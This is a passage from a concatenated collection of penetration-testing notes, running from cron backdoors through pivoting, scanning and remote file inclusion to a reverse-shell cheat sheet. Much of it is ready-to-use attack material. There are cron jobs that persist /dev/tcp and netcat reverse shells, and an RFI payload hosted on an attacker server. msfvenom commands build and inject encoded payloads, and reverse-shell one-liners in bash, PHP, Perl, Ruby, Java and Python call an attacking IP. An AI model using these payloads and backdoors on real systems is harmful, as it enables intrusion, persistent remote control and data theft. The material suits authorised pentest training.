 34 | ## Cronjob NC
 35 | 
 36 | Create cronjob that connects to your machine every 10 minutes. Here is an example using a bash-reverse-shell. You also need to set up a netcat listener.
 37 | 
 38 | Here is how you check if cronjob is active
 39 | 
 40 | ```
 41 | service crond status
 42 | pgrep cron
 43 | ```
 44 | 
 45 | If it is not started you can start it like this
 46 | 
 47 | ```
 48 | service crond status
 49 | /etc/init.d/cron start
 50 | ```
 51 | 
 52 | ```
 53 | crontab -e
 54 | */10 * * * * 0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196
 55 | ```
 56 | 
 57 | ```
 58 | /10 * * * * nc -e /bin/sh 192.168.1.21 5556
 59 | ```
 60 | 
 61 | Listener
 62 | 
 63 | ```
 64 | nc -lvp 5556
 65 | ```
 66 | 
 67 | Sometimes you have to set the user
 68 | 
 69 | ```
 70 | crontab -e
 71 | */10 * * * * pelle /path/to/binary
 72 | ```
 73 | 
 74 | 
 75 | More here: http://kaoticcreations.blogspot.cl/2012/07/backdooring-unix-system-via-cron.html
 76 | 
 77 | 
 78 | ## Metasploit persistence module
 79 | 
 80 | Create a binary with malicious content inside. Run that, get meterpreter shell, run metasploit persistence.
 81 | 
 82 | https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/
 83 | 
 84 | If you have a meterpreter shell you can easily just run `persistence`.
 85 | 
 86 | ## Backdoor in webserver
 87 | 
 88 | You can put a cmd or shell-backdoor in a webserver.
 89 | 
 90 | Put backdoor on webserver, either in separate file or in hidden in another file
 91 | 
 92 | ## Admin account to CMS
 93 | 
 94 | Add admin account to CMS.
 95 | 
 96 | ## Mysql-backdoor
 97 | 
 98 | Mysql backdoor
 99 | 
100 | ## Hide backdoor in bootblock
101 | 
102 | 
103 | ## Nmap
104 | 
105 | If the machine has nmap installed:
106 | 
107 | https://gist.github.com/dergachev/7916152
108 | 
109 | ## Setuid on text-editor
110 | 
111 | You can setuid on an editor. So if you can easily enter as a www-data, you can easily escalate to root through the editor. 
112 | 
113 | With `vi` it is extremely easy. You just run `:shell`, and it gives you a shell.
114 | 
115 | ```
116 | # Make root the owner of the file
117 | chown root myBinary
118 | 
119 | # set the sticky bit/suid
120 | chmod u+s myBinary
121 | ```
122 | 
123 | ## References
124 | 
125 | 
126 | Read this
127 | https://gist.github.com/dergachev/7916152
128 | 
129 | This is a creat introduction
130 | http://www.dankalia.com/tutor/01005/0100501002.htm
131 | 
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 


--------------------------------------------------------------------------------
/physical_access_to_machine.md:
--------------------------------------------------------------------------------
 1 | # Physical access to machine
 2 | 
 3 | So if you have physical access to a machine that is not encrypted it is really trivial to gain access to the hard-drive and all files on it.
 4 | 
 5 | This is how you do it
 6 | 
 7 | ## Create linux-usb
 8 | 
 9 | Just follow this guide for ubuntu
10 | http://www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu
11 | 
12 | ## Boot into live-usb on victim machine
13 | 
14 | If the machine doesn't automatically detect the usb you might have to enter into the bios. This can usually be done by pressing F12 or F1 on boot. Bios looks different from machine to machine. But you need to just choose to boot from the USB-device.
15 | 
16 | ## Mount disk
17 | 
18 | Now you have booted into the live-usb, now we need to mount the hard-drive to the usb-linux-filesystem.
19 | First we want to find out what partitions we have:
20 | 
21 | ```
22 | sudo su
23 | fdisk -l
24 | ```
25 | This will give you a list of partitions. They will look something like this
26 | 
27 | ```
28 | /dev/sda1
29 | /dev/sda2
30 | ```
31 | 
32 | Identify from the list the partition you want to mount.
33 | 
34 | Here we create a space for where we want to mount the partition.
35 | ```
36 | mkdir /media/windows
37 | ```
38 | 
39 | ```
40 | mount -t ntfs /dev/sda1 /media/windows
41 | ```
42 | 
43 | `-t`means type, and refers to the filesystem-type. And we choose ntfs which is the windows-filesystem.
44 | 
45 | Now you can access all the files from the harddrive in `/media/windows`
46 | 
47 | ## Umount the disk
48 | 
49 | Notice that is is `umount` and not unmount.
50 | 
51 | ```
52 | umount /media/windows
53 | ```
54 | 
55 | 
56 | ## Dump the hashes
57 | 
58 | https://prakharprasad.com/windows-password-cracking-using-john-the-ripper/


--------------------------------------------------------------------------------
/pivoting.md:
--------------------------------------------------------------------------------
 1 | # Pivoting
 2 | 
 3 | Let's say that you have compromised one machine on a network and you want to keep going to another machine. You will use the first machine as a staging point/plant/foothold to break into machine 2. Thid technique of using one compromised machine to access another is called pivoting. Machine one is the `pivot` in the example. The `pivot` is just used as a way to channel/tunnel our attack. 
 4 | 
 5 | #### Ipconfig
 6 | 
 7 | We are looking for machines that have at least THREE network interfaces (loopback, eth0, and eth1 (or something)). These machines are connected to other networks, so we can use them to pivot.
 8 | 
 9 | ```
10 | # Windows
11 | ipconfig /all
12 | route print
13 | 
14 | #Linux
15 | ifconfig
16 | ifconfig -a
17 | ```
18 | 
19 | ## Metasploit
20 | 
21 | 
22 | ### Ping-sweep the network
23 | 
24 | First we want to scan the network to see what devices we can target. In this example we already have a meterpreter shell on a windows machine with SYSTEM-privileges.
25 | 
26 | ```
27 | meterpreter > run arp_scanner -r 192.168.1.0/24
28 | ```
29 | This command will output all the devices on the netowork.
30 | 
31 | ### Scan each host
32 | 
33 | Now that we have a list of all available machines. We want to portscan them.
34 | 
35 | We will to that portscan through metasploit. Using this module:
36 | 
37 | ```
38 | use auxiliary/scanner/portscan/tcp
39 | ```
40 | 
41 | If we run that module now it will only scan machines in the network we are already on. So first we need to connect us into the second network.
42 | 
43 | On the already pwn machine we do
44 | 
45 | ```
46 | ipconfig
47 | ```
48 | 
49 | Now we add the second network as a new route in metasploit. First we background our session, and then do this:
50 | 
51 | ```
52 | # the ip addres and the subnet mask, and then the meterpreter session
53 | route add 192.168.11.1 255.255.255.0 1
54 | ```
55 | 
56 | Now we can run our portsanning module:
57 | 
58 | ```
59 | use auxiliary/scanner/portscan/tcp
60 | ```
61 | 
62 | ### Attack a specific port
63 | 
64 | In order to attack a specific port we need to forwards it like this
65 | 
66 | ```
67 | portfwd add -l 3389 -p 3389 -r 192.168.1.222
68 | ```
69 | 
70 | 
71 | 
72 | This is a good video-explanation:
73 | https://www.youtube.com/watch?v=c0XiaNAkjJA
74 | 
75 | https://www.offensive-security.com/metasploit-unleashed/pivoting/
76 | 
77 | http://ways2hack.com/how-to-do-pivoting-attack/


--------------------------------------------------------------------------------
/port_knocking.md:
--------------------------------------------------------------------------------
 1 | # Port knocking
 2 | 
 3 | Port-knocking the a obfuscation-as-security technique. It basically means that after knocking on ports in a specific sequence a certain port will open automatically. It seems to be more popular in Capture-the-flag contests than real life networks. But I have included it anyways, since CTF:s are great.
 4 | 
 5 | This is a way to hide certain ports, so you don't get unwanted intrusion-intents. 
 6 | 
 7 | So for example, imagine you access your server through `ssh`. But you are tired of getting unwanted bruteforce attempts all day long. You can just have the SSH-port closed and when you knock on certain ports in a specific order the ssh-port opens up, maybe for a few minutes, or maybe indefinitely until you close it again.
 8 | 
 9 | When you "knock" on a port you are really just sending TCP-packets with `SYN`-flag to that port. The closed port will then respond with a `ACK/RST`. Which basically means that the host has received the `TCP`-packet, and it ACKnolwdge it, but responds with a Reset (`RST`) flag. `RST` just means that the port is closed.
10 | 
11 | ## Software to implement port-knocking
12 | 
13 | I have seen the Knock software implemented.
14 | 
15 | ## Opening 
16 | 
17 | So, how do we actually knock?
18 | As mentioned before a knock is essentially just sending a packet to a specific port. 
19 | I guess there are quite a few ways to do this. But here are three ways.
20 | 
21 | 1. Knock
22 |   - `apt-get install knockd`
23 |   - Then you simply type: `knock [ip] [port]`. For example: `knock 192.168.1.102 4000 5000 6000`
24 |   - After that you have to scan the network to see if any new port is open.
25 |   - If you know what port is open you can connect to the port using netcat. The following command would work `nc 192.168.1.102 8888`. This would then connect to the port.
26 | 
27 | 2. Nmap/bash
28 | - `for x in 4000 5000 6000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done`
29 | 3. Netcat
30 | ```
31 | nc 192.168.1.102 4000
32 | nc 192.168.1.102 5000
33 | nc 192.168.1.102 6000
34 | nc 192.168.1.102 8888
35 | ```
36 | 
37 | ## Break it
38 | 
39 | One way hack a server with port-knocking implemented would be to sniff for packets on the network. So if you are on the same network and able to make MITM, you can just sniff that traffic and then find the sequence.
40 | 
41 | 
42 | ## Pitfalls
43 | 
44 | Using port-knocking as a way to secure your service might come with some risk. The biggest risk I suppose is that if the knock-daemon fails, for whatever reason. You will be shut out of you machine. There are of course ways to just restart the knock-daemon if it fails. But maybe that daemon fails as well.
45 | 
46 | 
47 | 
48 | ### References
49 | 
50 | This wikipedia-article is really worth reading.
51 | https://en.wikipedia.org/wiki/Port_knocking
52 | 
53 | 
54 | 
55 | 
56 | 


--------------------------------------------------------------------------------
/port_scanning.md:
--------------------------------------------------------------------------------
  1 | # Port Scanning
  2 | 
  3 | ## TLDR
  4 | 
  5 | ```
  6 | # Stealthy
  7 | nmap -sS 10.11.1.X
  8 | 
  9 | # Scan all ports, might take a while.
 10 | nmap 10.11.1.X -p-
 11 | 
 12 | # Scan for UDP
 13 | nmap 10.11.1.X -sU
 14 | unicornscan -mU -v -I 10.11.1.X
 15 | 
 16 | # Scan for version, with NSE-scripts and trying to identify OS
 17 | nmap 10.11.1.X -sV -sC -O
 18 | 
 19 | # All out monsterscan
 20 | nmap -vvv -Pn -A -iL listOfIP.txt
 21 | 
 22 | # Fast scan
 23 | nmap 10.11.1.X -F
 24 | 
 25 | # Only scan the 100 most common ports
 26 | nmap 10.11.1.X --top-ports 100
 27 | ```
 28 | 
 29 | ## Nmap
 30 | 
 31 | Now that you have gathered some IP addresses from your subdomain scanning it is time to scan those addresses. You just copy-paste those addresses and add them to a file, line by line. Then you can scan all of them with nmap at the same time. Using the `-iL` flag.
 32 | 
 33 | ### Basics - tcp-connect scan
 34 | 
 35 | Okay, so a bit of the basics of Nmap and how it works. When one machine initiate a connection with another machine using the **transmission-control protocol (tcp)** it performs what is know as a three-way handshake. That means:
 36 | ```
 37 | machine1 sends a syn packet to machine2
 38 | machine2 send a syn-ack packet to machine1
 39 | machine1 sends a ack packet to machine2.
 40 | ```
 41 | 
 42 | If machine2 responds with a syn-ack we know that that port is open. This is basically what nmap does when it scans for a port.
 43 | If machine1 omits the last ack packet the connection is not made. This can be a way to make less noise. 
 44 | 
 45 | This is the default mode for nmap. If you do not add any flags and scan a machine this is the type of connection it creates.
 46 | 
 47 | ### "Stealthy" -sS
 48 | 
 49 | By adding the `-sS` flag we are telling nmap to not finalize the three way handshake. It will send a `syn`, receive `syn-ack` (if the port is open), and then terminate the connection. This used to be considered stealthy before, since it was often not logged. However it should not be considered stealthy anymore.
 50 | 
 51 | In the flag I imagine that the first `s` stands for scan/scantype and the second `S` stands for `syn`.
 52 | 
 53 | So `-sS` can be read as **scantype syn**
 54 | 
 55 | ### UDP scan
 56 | 
 57 | UDP is after TCP the most common protocol. DNS (53), SNMP (161/162) and DHCP (67/68) are some common ones. Scanning for it is slow and unreliable.
 58 | 
 59 | ```
 60 | -sU
 61 | ```
 62 | 
 63 | 
 64 | #### Output scan to a textfile
 65 | 
 66 | Not all output works with grepable format. For example NSE does not work with grepable. So you might want to use xml instead.
 67 | 
 68 | ```
 69 | # To text-file
 70 | -oN nameOfFile
 71 | 
 72 | # To grepable format
 73 | -oG nameOfFile
 74 | 
 75 | # To xml
 76 | -oX nameOfFile
 77 | 
 78 | ```
 79 | 
 80 | 
 81 | ### Scan an entire IP-range
 82 | 
 83 | You might find that a site has several machines on the same ip-range. You can then use nmap to scan the whole range.
 84 | 
 85 | The `-sn` flag stops nmap from running port-scans. So it speeds up the process.
 86 | 
 87 | ```
 88 | nmap -vvv -sn 201.210.67.0/24
 89 | ```
 90 | 
 91 | You can also specify a specific range, like this
 92 | 
 93 | ```
 94 | nmap -sP 201.210.67.0-100
 95 | ````
 96 | 
 97 | #### Sort out the machines that are up
 98 | 
 99 | So let's say you find that 40 machine exists in that range. We can use grep to output those IP:s.
100 | 
101 | First let's find the IPs that were online. Ip-range is the output from previous command. You can of course combine them all.
102 | 
103 | ```bash
104 | cat ip-range.txt | grep -B 1 "Host is up"
105 | ```
106 | 
107 | Now let's sort out the ips from that file.
108 | 
109 | ```bash
110 | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ip-range.txt > only-ip.txt
111 | ```
112 | 
113 | Now you can input all those ips to nmap and scan them.
114 | 
115 | 
116 | #### Scan a range and output if a specific port is open
117 | 
118 | Nmap has a command to make the output grepable.
119 | 
120 | ```bash
121 | nmap -vvv -p 80 201.210.67.0-100 -oG - | grep 80/open
122 | ```
123 | 
124 | ### Nmap scripts
125 | 
126 | This chapter could also be placed in Vulnerability-analysis and Exploitation. Because nmap scripting is a really versatile tool that can do many things. Here we will focus on it's ability to retrieve information that can be useful in the process to **find vulnerabilities** 
127 | 
128 | 
129 | First locate the nmap scripts. Nmap scripts end in `.nse`. For Nmap script engine.
130 | 
131 | ```
132 | locate *.nse
133 | ```
134 | 
135 | The syntax for running a script is:
136 | 
137 | ```
138 | nmap --script scriptname 192.168.1.101
139 | ```
140 | 
141 | 
142 | To find the "man"-pages, the info about a script we write:
143 | 
144 | ```
145 | nmap -script-help http-vuln-cve2013-0156.nse
146 | ```
147 | 
148 | **Run multiple scripts**
149 | 
150 | Can be run by separating the script with a comma
151 | 
152 | ```
153 | nmap --script scriptone.nse,sciprt2.nse,script3.nse 192.168.1.101
154 | ```
155 | 
156 | Run the default scripts
157 | 
158 | ```
159 | nmap -sC example.com
160 | ```
161 | 
162 | 
163 | ## Metasploit
164 | 
165 | We can do port-scanning with metasploit and nmap. And we can even integrate nmap into metasploit. This might be a good way to keep your process neat and organized. 
166 | 
167 | ### db_nmap
168 | 
169 | You can run `db_nmap` and all the output will be stored in the metasploit database and available with 
170 | 
171 | ```
172 | hosts
173 | services
174 | ```
175 | 
176 | You can also import nmap scans. But you must first output it in xml-format with the following flag  
177 | 
178 | ```
179 | nmap 192.168.1.107 -oX result.xml
180 | ```
181 | 
182 | Good practice would be to output the scan-results in xml, grepable and normal format. You do that with
183 | 
184 | ```
185 | nmap 192.168.1.107 -oA result
186 | ```
187 | 
188 | Then you can load it into the database with the following command. 
189 | 
190 | ```
191 | db_import /path/to/file.xml
192 | ```
193 | 
194 | ### Metasploit PortScan modules
195 | 
196 | If you for some reason don't have access to nmap you can run metasploits modules that does portscans
197 | 
198 | ```
199 | use auxiliary/scanner/portscan/
200 | ```
201 | 
202 | 


--------------------------------------------------------------------------------
/post_exploitation.md:
--------------------------------------------------------------------------------
 1 | # Post Exploitation
 2 | 
 3 | In order to move horizontally on the network we need to know as much about the machine as possible. We need to loot it. These are some things that must be done on every compromised machine.
 4 | 
 5 | 
 6 | ### Tcp dump
 7 | Who else is connected to the machine?
 8 | 
 9 | ### Dump the hashes
10 | 
11 | It is always good to have a list of all the hashes and crack them. Maybe someone is reusing the password. 
12 | 
13 | ### To what is the machine connected?
14 | 
15 | netstat
16 | 
17 | ipconfig
18 | 
19 | ### Email and personal files
20 | 
21 | ### Logs
22 | 
23 | 
24 | 


--------------------------------------------------------------------------------
/powershell.md:
--------------------------------------------------------------------------------
  1 | # PowerShell
  2 | 
  3 | PowerShell is Windows new shell. It comes by default from Windows 7. But can be downloaded and installed in earlier versions.
  4 | 
  5 | * PowerShell provides access to almost everything an attacker might want.
  6 | * It is based on the .NET framework.
  7 | * It is basically bash for windows
  8 | * The commands are case-insensitive
  9 | 
 10 | ## Basics
 11 | 
 12 | So a command in PowerShell is called **cmdlet**. The cmdlets are created using a verb and a noun. Like `Get-Command`, Get is a  verb and  Command is a noun. Other verbs can be: remove, set, disable, install, etc.
 13 | 
 14 | 
 15 | 
 16 | To get help on how to use a **cmdlet** while in PowerShell, the man-page, you do:
 17 | 
 18 | ```
 19 | Get-Help    <cmdlet    name    |    topic    name>
 20 | ```
 21 | 
 22 | Example
 23 | 
 24 | ```
 25 | get-help echo
 26 | get-help get-command
 27 | ```
 28 | 
 29 | **Powershell Version and Build**
 30 | 
 31 | ```
 32 | $PSVersionTable
 33 | ```
 34 | 
 35 | ### Fundamentals
 36 | 
 37 | With get-member you can list all the properties and methods of the object that the command returns.
 38 | 
 39 | ```
 40 | Get-Member
 41 | For example:
 42 | Get-Command | Get-Member
 43 | Get-Process | Get-Member
 44 | ```
 45 | 
 46 | 
 47 | 
 48 | Select-XXX
 49 | 
 50 | ```
 51 | Select-object
 52 | ```
 53 | 
 54 | 
 55 | 
 56 | #### Variables
 57 | 
 58 | ```
 59 | $testVar = "blabla"
 60 | ```
 61 | 
 62 | 
 63 | 
 64 | 
 65 | 
 66 | **Wget / Download a file**
 67 | 
 68 | ```
 69 | Invoke-WebRequest <uri>
 70 | wget <uri>
 71 | ```
 72 | 
 73 | **Grep**
 74 | 
 75 | ```
 76 | Select string can be used like grep
 77 | get-command | select-string blabla
 78 | ```
 79 | 
 80 | **General commands that can be used on objects**
 81 | 
 82 | ```
 83 | measure-object -words
 84 | get-content fil.txt | measure-object words
 85 | ```
 86 | 
 87 | ### Working with filesystem
 88 | 
 89 | **List all files in current directory**
 90 | 
 91 | ```
 92 | get-childitem
 93 | gci
 94 | 
 95 | List hidden files too
 96 | gci -Force
 97 | 
 98 | List all files recurisvely
 99 | gci -rec
100 | 
101 | Count the files
102 | (get-childitem).count
103 | List all files but exclude some folders
104 | gci -exclude AppData | gci -rec -force
105 | ```
106 | 
107 | ### Working with files
108 | 
109 | ```
110 | Read a file
111 | Get-Content
112 |     gc
113 |     cat
114 | Count lines of file
115 | (get-content .\file).count
116 | Select specific line in a file (remember that it starts from 0)
117 | (gc .\file.txt)[10]
118 | gc .\file.txt | Select -index 10
119 | ```
120 | 
121 | ### Services
122 | 
123 | ```
124 | List services
125 | get-service
126 | ```
127 | 
128 | ### Network related stuff
129 | 
130 | Domain information
131 | 
132 | ```
133 | Get-ADDomain
134 | Get-AdDomainController
135 | Get-AdComputer
136 | To see a list of all properties do this
137 | get-adcomputer ComputerName -prop *
138 | 
139 | Get AD Users
140 | Get-ADUser -f {Name -eq 'Karl, Martinez'} -properties *
141 | 
142 | Get all AD Groups
143 | Get-ADGroup -filter *
144 | 
145 | 
146 | 
147 | Resolve DNS
148 | Resolve-DNSname 10.10.10.10
149 | 
150 | ```
151 | 
152 | 
153 | 
154 | 


--------------------------------------------------------------------------------
/powershell_scripting2.md:
--------------------------------------------------------------------------------
 1 | # Powershell scripting
 2 | 
 3 | 
 4 | ## Variables
 5 | 
 6 | Variables are declared like this
 7 | 
 8 | ```powershell
 9 | $test = "something"
10 | ```
11 | 
12 | ## Execute scripts
13 | 
14 | So for security reasons the default policy for executing scripts is **Restricted**. Here are the different script-policies.
15 | 
16 | 
17 | **Restricted**: PowerShell won't run any scripts. This is PowerShell's default execution policy.
18 | 
19 | **AllSigned**: PowerShell will only run scripts that are signed with a digital signature. If you run a script signed by a publisher PowerShell hasn't seen before, PowerShell will ask whether you trust the script's publisher.
20 | 
21 | **RemoteSigned**: PowerShell won't run scripts downloaded from the Internet unless they have a digital signature, but scripts not downloaded from the Internet will run without prompting. If a script has a digital signature, PowerShell will prompt you before it runs a script from a publisher it hasn't seen before.
22 | 
23 | **Unrestricted**: PowerShell ignores digital signatures but will still prompt you before running a script downloaded from the Internet.
24 | 
25 | 
26 | Source: http://windowsitpro.com/powershell/running-powershell-scripts-easy-1-2-3
27 | 
28 | So if we want to run script `myscript.ps1` we have to set the execution-policy.
29 | First let's check what execution-policy we currently have:
30 | 
31 | ```powershell
32 | Get-ExecutionPolicy
33 | ```
34 | 
35 | Then we can set the execution policy like this
36 | 
37 | ```powershell
38 | set-ExecutionPolicy unrestricted
39 | ```
40 | 
41 | ## References
42 | https://github.com/samratashok/nishang
43 | https://www.youtube.com/watch?v=czJrXiLs0wM
44 | 


--------------------------------------------------------------------------------
/privilege-escalation-powershell.md:
--------------------------------------------------------------------------------
 1 | ## Privilege Escalation with Powershell
 2 | 
 3 | 
 4 | 
 5 | ```
 6 | What modules are available to us?
 7 | get-module -listavailable
 8 | ```
 9 | 
10 | 
11 | 
12 | 


--------------------------------------------------------------------------------
/python_fundamentals.md:
--------------------------------------------------------------------------------
 1 | # Python fundamentals
 2 | 
 3 | ## Array/list
 4 | 
 5 | ```python
 6 | my_list = [1,"string",3,4,5]
 7 | for item in my_list:
 8 |     print item
 9 | 
10 | # Append/push to list
11 | my_list.append("addMe")
12 | ```
13 | 
14 | 
15 | ## Modules
16 | 
17 | Always good to modular your code.
18 | 
19 | **module1.py**
20 | 
21 | ```python
22 | 
23 | def addNumbers(numberOne, numberTwo):
24 |     return numberOne + numberTwo
25 | ```
26 | 
27 | **script.py**
28 | 
29 | ```python
30 | import module1
31 | 
32 | total = module1.addNumbers(1,2)
33 | print total
34 | ```
35 | 
36 | 
37 | ## Pip - package management
38 | 
39 | Pip is the python package manager. It ca be used to download other modules.
40 | 
41 | Install pip
42 | 
43 | ```bash
44 | sudo apt-get install python-pip
45 | ```
46 | 
47 | 
48 | To install package
49 | 
50 | ```bash
51 | pip install package
52 | ```


--------------------------------------------------------------------------------
/random-stuff.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/random-stuff.md


--------------------------------------------------------------------------------
/recon-ng.md:
--------------------------------------------------------------------------------
 1 | # recon-ng
 2 | Recon-ng is a recognissance-tool that can be used to enumerate subdomains and many other things.
 3 | 
 4 | 1. Create a workspace
 5 | - We should first start a new workspace. FOr the project we are working on.
 6 | 
 7 | `workspace add test.com`
 8 | 
 9 | Now we can start using modules, with the `use` command.
10 | 
11 | It follows this pattern, using outcomplete.
12 | 
13 | `use recon/domains-contacts/pgp_search`
14 | 
15 | Then we can look at the options.
16 | 
17 | `show options`
18 | 
19 | Then set the options
20 | 
21 | `set source test.com`
22 | 
23 | If you have already set a workspace the source default will be test.com
24 | 
25 | To run the module we just run
26 | `run`
27 | 
28 | Then the hosts, or contacts table might be updated. Depending on what is found. We can see what is updated by looking at the dashboard.
29 | 
30 | `show dashboard`
31 | 
32 | Then:
33 | 
34 | `show hosts`


--------------------------------------------------------------------------------
/remote_file_inclusion.md:
--------------------------------------------------------------------------------
 1 | # Remote File Inclusion
 2 | 
 3 | Remote file inclusion uses pretty much the same vector as local file inclusion.
 4 | 
 5 | A remote file inclusion vulnerability lets the attacker execute a script on the target-machine even though it is not even hosted on that machine. 
 6 | 
 7 | RFI's are less common than LFI. Because in order to get them to work the developer must have edited the `php.ini` configuration file.
 8 | 
 9 | This is how they work.
10 | 
11 | So you have an unsanitized parameter, like this
12 | 
13 | ```
14 | $incfile = $_REQUEST["file"];
15 | include($incfile.".php");
16 | ```
17 | 
18 | Now what you can do is to include a file that is not hosted on the victim-server, but instead on the attackers server.
19 | 
20 | ```
21 | http://exampe.com/index.php?page=http://attackerserver.com/evil.txt
22 | ```
23 | 
24 | And evil.txt will look like something like this:
25 | 
26 | ```
27 | <?php echo shell_exec("whoami");?>
28 | 
29 | # Or just get a reverse shell directly like this:
30 | <?php echo system("0<&196;exec 196<>/dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?>
31 | 
32 | ```
33 | 
34 | So when the victim-server includes this file it will automatically execute the commands that are in the evil.txt file. And we have a RCE.
35 | 
36 | 
37 | ## Avoid extentions
38 | 
39 | Remember to add the nullbyte `%00` to avoid appending `.php`. This will only work on php before version 5.3. 
40 | 
41 | If it does not work you can also add a `?`, this way the rest will be interpreted as url parameters.


--------------------------------------------------------------------------------
/reverse-shell.md:
--------------------------------------------------------------------------------
  1 | # Reverse-shells
  2 | 
  3 | This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet:  
  4 | [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
  5 | 
  6 | [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
  7 | 
  8 | ## Msfvenom
  9 | 
 10 | There is an important difference between non-staged and staged payload. A **non-staged** shell is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler. But also with netcat.
 11 | 
 12 | **staged** shells send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat.
 13 | 
 14 | ### Windows
 15 | 
 16 | #### Meterpreter
 17 | 
 18 | **Standard meterpreter**
 19 | 
 20 | ```
 21 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
 22 | ```
 23 | 
 24 | ```
 25 | use exploit/multi/handler
 26 | set payload windows/meterpreter/reverse_tcp
 27 | ```
 28 | 
 29 | **Meterpreter HTTPS**
 30 | 
 31 | It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.
 32 | 
 33 | ```
 34 | msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
 35 | ```
 36 | 
 37 | #### Non-staged payload
 38 | 
 39 | ```
 40 | msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
 41 | ```
 42 | 
 43 | ```
 44 | use exploit/multi/handler
 45 | set payload windows/shell_reverse_tcp
 46 | ```
 47 | 
 48 | #### Staged payload
 49 | 
 50 | ```
 51 | msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe
 52 | ```
 53 | 
 54 | This must be caught with metasploit. It does not work with netcat.
 55 | 
 56 | ```
 57 | use exploit/multi/handler
 58 | set payload windows/shell/reverse_tcp
 59 | ```
 60 | 
 61 | ### Inject payload into binary
 62 | 
 63 | ```
 64 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
 65 | ```
 66 | 
 67 | ## Linux
 68 | 
 69 | ### Binary
 70 | 
 71 | ```
 72 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f elf > shell.elf
 73 | ```
 74 | 
 75 | ### Bash
 76 | 
 77 | ```
 78 | 0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196
 79 | ```
 80 | 
 81 | ```
 82 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
 83 | ```
 84 | 
 85 | ### Php
 86 | 
 87 | ```
 88 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
 89 | ```
 90 | 
 91 | ### Netcat
 92 | 
 93 | **Bind shell**
 94 | 
 95 | ```
 96 | #Linux
 97 | nc -vlp 5555 -e /bin/bash
 98 | nc 192.168.1.101 5555
 99 | 
100 | # Windows
101 | nc.exe -nlvp 4444 -e cmd.exe
102 | ```
103 | 
104 | **Reverse shell**
105 | 
106 | ```
107 | # Linux
108 | nc -lvp 5555
109 | nc 192.168.1.101 5555 -e /bin/bash
110 | 
111 | # Windows
112 | nc -lvp 443
113 | nc.exe 192.168.1.101 443 -e cmd.exe
114 | ```
115 | 
116 | **With -e flag**
117 | 
118 | ```
119 | nc -e /bin/sh ATTACKING-IP 80
120 | ```
121 | 
122 | ```
123 | /bin/sh | nc ATTACKING-IP 80
124 | ```
125 | 
126 | **Without -e flag**
127 | 
128 | ```
129 | rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
130 | 
131 | ```
132 | 
133 | Upgrade Netcat shell to an interactive: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
134 | 
135 | ### Ncat
136 | 
137 | Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted.
138 | 
139 | Bind
140 | 
141 | ```
142 | ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
143 | ncat -v 192.168.1.103 5555 --ssl
144 | ```
145 | 
146 | ### Telnet
147 | 
148 | ```
149 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
150 | ```
151 | 
152 | ```
153 | telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
154 | ```
155 | 
156 | ### Perl
157 | 
158 | ```
159 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
160 | ```
161 | 
162 | ### Ruby
163 | 
164 | ```
165 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
166 | ```
167 | 
168 | ### Java
169 | 
170 | ```
171 | r = Runtime.getRuntime()
172 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
173 | p.waitFor()
174 | ```
175 | 
176 | ### Python
177 | 
178 | ```
179 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
180 | ```
181 | 
182 | ## Web-shells - Platform Independent
183 | 
184 | ### PHP
